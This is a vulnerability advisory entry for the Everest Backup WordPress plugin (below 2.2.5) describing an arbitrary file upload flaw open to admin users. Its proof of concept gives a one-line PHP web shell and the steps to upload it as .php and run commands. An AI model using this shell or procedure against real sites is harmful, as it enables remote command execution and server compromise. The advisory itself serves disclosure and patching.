WordPress Plugin Vulnerabilities
Everest Backup < 2.2.5 - Admin+ Arbitrary File Upload
Description
The plugin does not properly validate backup files to be uploaded, allowing high privilege users such as admin to upload arbitrary files on the server even when they should not be allowed to (for example in multisite setup)
Proof of Concept
1. Go to the plugin setting and in the "Restore" section upload the backup file by the "Select File" button(.ebwp format). Select an a file on your computer with the `.ebwp` extension. It must have some contents to pass the plugins validation check. As a PoC, add `<?php echo system($_GET['cmd']); ?>` 2. Capture the HTTP request and in "Content-Disposition:" change the file extension `.php`. 3. Check the response of the HTTP request and if the upload was successful the status code will be "200" and in the body, you can see the path of your file. 4. Open the file and run the code, i.e `cmd.php?cmd=ls` open the file and run your code. In this example, you will get a directory listing.
Affects Plugins
References
CVE
YouTube Video
Miscellaneous
Original Researcher
Emad
Submitter
Emad
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2024-03-25 (about 1 months ago)
Added
2024-03-25 (about 1 months ago)
Last Updated
2024-03-25 (about 1 months ago)